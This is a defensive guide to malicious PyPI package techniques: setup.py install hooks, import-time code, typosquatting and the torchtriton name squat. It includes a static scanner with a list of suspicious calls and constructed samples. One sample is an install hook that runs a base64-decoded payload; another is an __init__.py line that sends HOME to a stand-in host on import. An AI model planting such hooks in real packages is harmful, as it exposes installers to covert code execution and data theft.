👾 Malicious Package Techniques

Adversary Techniques

The setup.py Install Script

Always check for a setup.py file in a package.

When you run pip install, pip executes the package's setup.py whenever it has to build from source: a source distribution (sdist), a local directory, or a VCS URL. Installing a prebuilt wheel does not run it, but pip falls back to the sdist whenever no wheel matches your platform or Python version, so you cannot assume it is skipped. Everything at the top level of setup.py, and any setuptools command subclass registered through the cmdclass argument, runs with the privileges of the user invoking pip. That is why you should never run pip with sudo or administrator rights. The setup.py file is an easy target for attackers, so always review its contents before installing; fetch the archive from the project's files page on pypi.org and read it rather than letting pip run it. Restricting installs to wheels with pip install --only-binary=:all: removes this particular vector, though not the import-time one covered next. This vector is well known to defenders and is the first place a reviewer looks, so the attackers still relying on it alone tend to be the least sophisticated.

The __init__.py File

Every regular package contains an __init__.py file, because that file is what marks a directory on disk as a Python package (PEP 420 namespace packages are the exception). When you import the package, __init__.py is executed in full, so any code placed at its top level runs the first time anyone imports the package, from a wheel or an sdist alike and no matter how carefully setup.py was reviewed. This is how the malicious package ascii2text was able to run code that stole passwords and uploaded them to a webhook.
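To make the review of setup.py and __init__.py described in the two sections above less ad hoc, here is an added example (not code from this page or from any project it mentions) of a static triage script: it parses each file with Python's ast module and reports install-time command hooks (cmdclass, subclasses of setuptools.command.*), calls into exec/subprocess/network/decoding primitives, and, for __init__.py, any module-level statement that executes on import. The indicator list, the two sample files and the PAYLOAD placeholder are constructed for the example; a real scan would run over the extracted sdist or wheel. Findings are prompts for a human, not verdicts.

```python
import ast
from typing import Dict, List, Tuple

# Calls whose presence in setup.py or __init__.py deserves a manual look. An assumed
# starter list for this example, not an exhaustive indicator set.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile", "__import__", "os.system", "os.popen",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "urllib.request.urlopen", "requests.get", "requests.post", "socket.socket",
    "base64.b64decode", "codecs.decode", "zlib.decompress",
}
# Subclassing one of these command families is how setup.py hooks the install step.
INSTALL_COMMAND_PREFIXES = ("setuptools.command.", "distutils.command.")
# Module-level statement types that define things rather than execute on import.
HARMLESS_TOP_LEVEL = (ast.Import, ast.ImportFrom, ast.FunctionDef,
                      ast.AsyncFunctionDef, ast.ClassDef, ast.Assign, ast.AnnAssign)


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything more dynamic."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _import_table(tree: ast.AST) -> Dict[str, str]:
    """Map each locally bound import name to the fully qualified name it refers to."""
    table: Dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:  # 'import a.b' binds the top-level name 'a'
                local = alias.asname or alias.name.split(".")[0]
                table[local] = alias.name if alias.asname else local
        elif isinstance(node, ast.ImportFrom):
            for alias in node.names:
                table[alias.asname or alias.name] = f"{node.module or ''}.{alias.name}"
    return table


def _resolve(name: str, table: Dict[str, str]) -> str:
    head, sep, rest = name.partition(".")
    return table.get(head, head) + sep + rest


def scan_source(source: str, filename: str) -> List[str]:
    """Return sorted 'file:line: finding' strings for one setup.py or __init__.py."""
    try:
        tree = ast.parse(source, filename=filename)
    except SyntaxError as exc:  # broken or obfuscated code is itself worth a look
        return [f"{filename}:{exc.lineno or 0}: could not parse ({exc.msg})"]
    table = _import_table(tree)
    findings: List[Tuple[int, str]] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _resolve(_dotted_name(node.func), table)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"call to {name}"))
            # setup(..., cmdclass={...}) swaps in a custom command that runs on install
            if name in ("setuptools.setup", "distutils.core.setup", "setup"):
                if any(kw.arg == "cmdclass" for kw in node.keywords):
                    findings.append((node.lineno, "setup() overrides cmdclass"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = _resolve(_dotted_name(base), table)
                if name.startswith(INSTALL_COMMAND_PREFIXES):
                    findings.append((node.lineno, f"class {node.name} subclasses {name}"))
    # In __init__.py anything at module level that is not a definition runs on import.
    if filename.endswith("__init__.py"):
        for stmt in tree.body:
            docstring = isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Constant)
            if not isinstance(stmt, HARMLESS_TOP_LEVEL) and not docstring:
                findings.append((stmt.lineno, f"top-level {type(stmt).__name__} runs on import"))
    return [f"{filename}:{line}: {msg}" for line, msg in sorted(findings)]


# Constructed samples for the example; PAYLOAD is a placeholder string, not real code.
SAMPLE_SETUP_PY = '''\
import base64, subprocess
from setuptools import setup
from setuptools.command.install import install
PAYLOAD = "<omitted>"
class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.run(["python", "-c", base64.b64decode(PAYLOAD)])
setup(name="example", version="0.1", cmdclass={"install": PostInstall})
'''
SAMPLE_INIT_PY = '''\
"""Harmless-looking package."""
import os
from urllib.request import urlopen
def render(text):
    return text.upper()
urlopen("https://example.invalid/hook", data=os.environ.get("HOME", "").encode())
'''
```

Because it parses rather than executes, the script can be run on an archive that pip has not yet touched. It resolves from-imports on purpose, so `from urllib.request import urlopen` followed by `urlopen(...)` is reported under its full name; code that builds names dynamically (getattr, __import__ with a computed string) escapes it, which is itself a reason to look harder at that file.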

Package Name Typo Squatting

Adversaries publish packages whose names mimic popular packages, typically by dropping, swapping or adding a single letter, so that a typo at the command line or in a requirements file pulls in their package instead of the one you meant.

For example, the malicious package chekov typosquatted the legitimate package checkov.

checkov vs. chekov

Not only are the package names similar, but the project description is identical, so the PyPI page gives nothing away at a glance. Compare the author, the upload dates and the release history instead, and check that the name you typed is the one you meant.

Package Name Squatting

Package name squatting occurs when a popular Python package exists on another site (such as GitHub or a private index) but has never been published to pypi.org. Adversaries see this as an opportunity to claim the unused name on pypi.org and upload a malicious package under it.

This happened to PyTorch in December 2022. PyTorch's nightly (preview) build depended on a package called torchtriton that was hosted only on PyTorch's own package index, so the name was unclaimed on pypi.org and an attacker registered it. Because pip gives no priority to one index over another, it pools the candidates from --index-url and every --extra-index-url and installs the highest version it finds, so users who installed the nightly build with pypi.org still in the mix received the attacker's upload instead of the PyTorch one. The defence is to point pip at a single trusted index for such names, or to pin versions together with hashes so that a substituted artifact fails verification.
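An added example (not PyTorch's or pip's code) that models why the torchtriton squat worked and what stops it: a simplified version of pip's candidate selection across --index-url and --extra-index-url, plus hash-checking mode. The index URLs, version numbers and artifact bytes are constructed for the example; the tie-break rule is the model's own, not pip's.

```python
import hashlib
from typing import Iterable, List, NamedTuple, Optional, Tuple


class Candidate(NamedTuple):
    """One installable artifact as an index advertises it (bytes constructed here)."""
    name: str
    version: Tuple[int, ...]
    index: str
    content: bytes

    @property
    def sha256(self) -> str:
        return hashlib.sha256(self.content).hexdigest()


def parse_version(text: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in text.split("."))


# Assumed index URLs and constructed artifacts: the vendor index carries the real
# package, the public index carries a same-named upload with a higher version.
VENDOR_INDEX = "https://download.pytorch.org/whl/nightly/cpu"
PUBLIC_INDEX = "https://pypi.org/simple"
CANDIDATES: List[Candidate] = [
    Candidate("torchtriton", parse_version("2.0.0"), VENDOR_INDEX, b"vendor build (constructed)"),
    Candidate("torchtriton", parse_version("3.0.0"), PUBLIC_INDEX, b"squatted upload (constructed)"),
]
# A squatter can also match the pinned version exactly; only a hash tells them apart.
SQUATTED_SAME_VERSION = Candidate("torchtriton", parse_version("2.0.0"), PUBLIC_INDEX,
                                  b"squatted upload with matching version (constructed)")


def resolve(name: str, index_url: str, extra_index_urls: Iterable[str] = (),
            pinned_version: Optional[str] = None,
            candidates: Iterable[Candidate] = CANDIDATES) -> Optional[Candidate]:
    """Simplified model of pip's candidate selection. Candidates from --index-url and
    every --extra-index-url are pooled with no priority between indexes and the
    highest version wins. Ties are broken here by index order purely so the model
    is deterministic; pip itself makes no such promise."""
    order = [index_url, *extra_index_urls]
    pool = [c for c in candidates if c.name == name and c.index in order]
    if pinned_version is not None:
        pool = [c for c in pool if c.version == parse_version(pinned_version)]
    if not pool:
        return None
    return max(pool, key=lambda c: (c.version, -order.index(c.index)))


def hash_checked_install(name: str, index_url: str, extra_index_urls: Iterable[str],
                         pinned_version: str, pinned_sha256: str,
                         candidates: Iterable[Candidate] = CANDIDATES) -> Candidate:
    """pip's --require-hashes behaviour: select as usual, download, then abort if the
    artifact's digest is not the pinned one instead of trying another candidate."""
    chosen = resolve(name, index_url, extra_index_urls, pinned_version, candidates)
    if chosen is None:
        raise LookupError(f"no candidate for {name}=={pinned_version}")
    if chosen.sha256 != pinned_sha256:
        raise ValueError(f"hash mismatch for {name}=={pinned_version} from {chosen.index}")
    return chosen


def pinned_requirement(candidate: Candidate) -> str:
    """requirements.txt line in the form hash-checking mode expects."""
    version = ".".join(str(p) for p in candidate.version)
    return f"{candidate.name}=={version} --hash=sha256:{candidate.sha256}"
```

Run through the scenarios: with pypi.org as the index and the vendor index as an extra, resolve() returns the 3.0.0 upload from the public index, which is the shape of the PyTorch incident; with the vendor index alone it returns the vendor build; and with a version pin plus a hash, a squatted copy that even matches the version is refused because its digest differs. The pinned_requirement() output is the line to put in requirements.txt so that pip install --require-hashes enforces this.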
